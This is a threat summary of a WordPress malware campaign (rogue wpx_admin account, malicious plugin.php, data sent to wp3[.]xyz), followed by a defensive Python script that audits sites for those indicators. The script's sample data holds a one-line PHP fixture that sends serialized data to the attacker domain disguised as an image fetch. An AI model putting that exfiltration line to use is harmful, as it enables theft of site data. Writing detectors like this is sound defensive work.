Summary: A new malware campaign has compromised over 5,000 WordPress sites by creating rogue admin accounts, installing a malicious plugin, and stealing sensitive data. The attack uses the wp3[.]xyz domain for data exfiltration; the initial infection vector is still under investigation.
Threat Actor: Unknown | unknown
Victim: WordPress Sites | WordPress Sites
Key Points:
- The malware creates a rogue admin account named wpx_admin with hardcoded credentials.
- A malicious plugin (plugin.php) is installed to collect sensitive data and exfiltrate it disguised as image requests.
- Website owners are advised to block the wp3[.]xyz domain and review their accounts and plugins for unauthorized activity.
- Strengthening CSRF protections and implementing multi-factor authentication are recommended for enhanced security.
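The three indicators the summary names (the wpx_admin account, a plugin file called plugin.php, and traffic to wp3[.]xyz) can be checked mechanically. The script below is an added defender-side example, not code from the advisory or from any named project: it audits a WordPress user export, the files under the plugins directory, and an outbound-request log, and reports what matches. The input shapes (the user dict keys, the path-to-contents mapping, and the `<timestamp> <host> <path>` log format) and all sample data are constructed for this example.

```python
"""Audit a WordPress site for the indicators named in the advisory above.

Constructed example: checks a user export, plugin files and an outbound-request
log for the rogue wpx_admin account, a bare plugin.php in the plugins directory,
and requests to wp3[.]xyz. Input formats are assumptions made for this example.
"""
import re
from dataclasses import dataclass

EXFIL_DOMAIN = "wp3.xyz"        # reported (defanged) as wp3[.]xyz
ROGUE_LOGIN = "wpx_admin"       # rogue admin account name from the advisory
# Matches the domain whether written plainly or defanged, in any case.
DOMAIN_RE = re.compile(r"wp3\[?\.\]?xyz", re.IGNORECASE)
IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif", ".webp")


@dataclass(frozen=True)
class Finding:
    severity: str   # "high" or "medium"
    kind: str       # short machine-readable tag
    detail: str     # human-readable explanation


def audit_users(users, known_admins):
    """users: list of {"user_login": str, "roles": [str]} (assumed export shape).
    known_admins: set of administrator logins the site owner recognises."""
    findings = []
    for user in users:
        login = user.get("user_login", "")
        roles = set(user.get("roles", []))
        if login == ROGUE_LOGIN:
            findings.append(Finding("high", "rogue-admin",
                                    f"account '{login}' matches the known rogue admin name"))
        elif "administrator" in roles and login not in known_admins:
            findings.append(Finding("medium", "unexpected-admin",
                                    f"administrator '{login}' is not in the known-admin list"))
    return findings


def audit_plugin_files(plugin_files):
    """plugin_files: dict of path -> file contents, read from wp-content/plugins (assumed)."""
    findings = []
    for path, content in plugin_files.items():
        # A bare plugin.php directly in the plugins directory (no plugin folder)
        # matches the file name reported in the advisory.
        if path.replace("\\", "/").endswith("/plugins/plugin.php"):
            findings.append(Finding("high", "suspect-plugin-file",
                                    f"{path} matches the reported malicious plugin file name"))
        if DOMAIN_RE.search(content):
            findings.append(Finding("high", "exfil-domain-reference",
                                    f"{path} references {EXFIL_DOMAIN}"))
    return findings


def audit_outbound_log(lines):
    """lines: one outbound request per line, '<timestamp> <host> <path>' (constructed format)."""
    findings = []
    for line in lines:
        parts = line.split()
        if len(parts) < 3:
            continue
        host, path = parts[1].lower(), parts[2]
        if DOMAIN_RE.fullmatch(host):
            # The advisory notes the exfiltration is disguised as image requests.
            disguised = " disguised as an image fetch" if path.lower().endswith(IMAGE_EXT) else ""
            findings.append(Finding("high", "exfil-request", f"request to {host}{path}{disguised}"))
    return findings


def run_audit(users, known_admins, plugin_files, log_lines):
    """Return all findings, highest severity first (stable sort keeps input order within a level)."""
    findings = (audit_users(users, known_admins)
                + audit_plugin_files(plugin_files)
                + audit_outbound_log(log_lines))
    order = {"high": 0, "medium": 1}
    return sorted(findings, key=lambda f: order[f.severity])


# --- Constructed sample input (not real site data) ---------------------------
SAMPLE_USERS = [
    {"user_login": "alice", "roles": ["administrator"]},
    {"user_login": "wpx_admin", "roles": ["administrator"]},
    {"user_login": "bob", "roles": ["editor"]},
    {"user_login": "backup_svc", "roles": ["administrator"]},
]
SAMPLE_KNOWN_ADMINS = {"alice"}
SAMPLE_PLUGIN_FILES = {
    "wp-content/plugins/akismet/akismet.php": "<?php /* Plugin Name: Akismet */",
    "wp-content/plugins/plugin.php":
        "<?php $u = 'https://wp3.xyz/img/' . md5(serialize($data)) . '.png'; file_get_contents($u);",
}
SAMPLE_LOG = [
    "2025-01-01T10:00:00Z api.wordpress.org /core/version-check/1.7/",
    "2025-01-01T10:00:05Z wp3.xyz /img/1a2b3c.png",
    "2025-01-01T10:00:09Z wp3.xyz /img/4d5e6f.gif",
]

if __name__ == "__main__":
    for f in run_audit(SAMPLE_USERS, SAMPLE_KNOWN_ADMINS, SAMPLE_PLUGIN_FILES, SAMPLE_LOG):
        print(f"[{f.severity.upper()}] {f.kind}: {f.detail}")
```

On the sample data this reports the rogue account, the unrecognised `backup_svc` administrator, the bare plugin.php both by name and by its reference to the exfiltration domain, and the two image-looking requests to wp3.xyz. The known-admin allow-list is what makes the account check useful beyond the one hardcoded name: an attacker who picks a different login still shows up as an administrator the owner did not create.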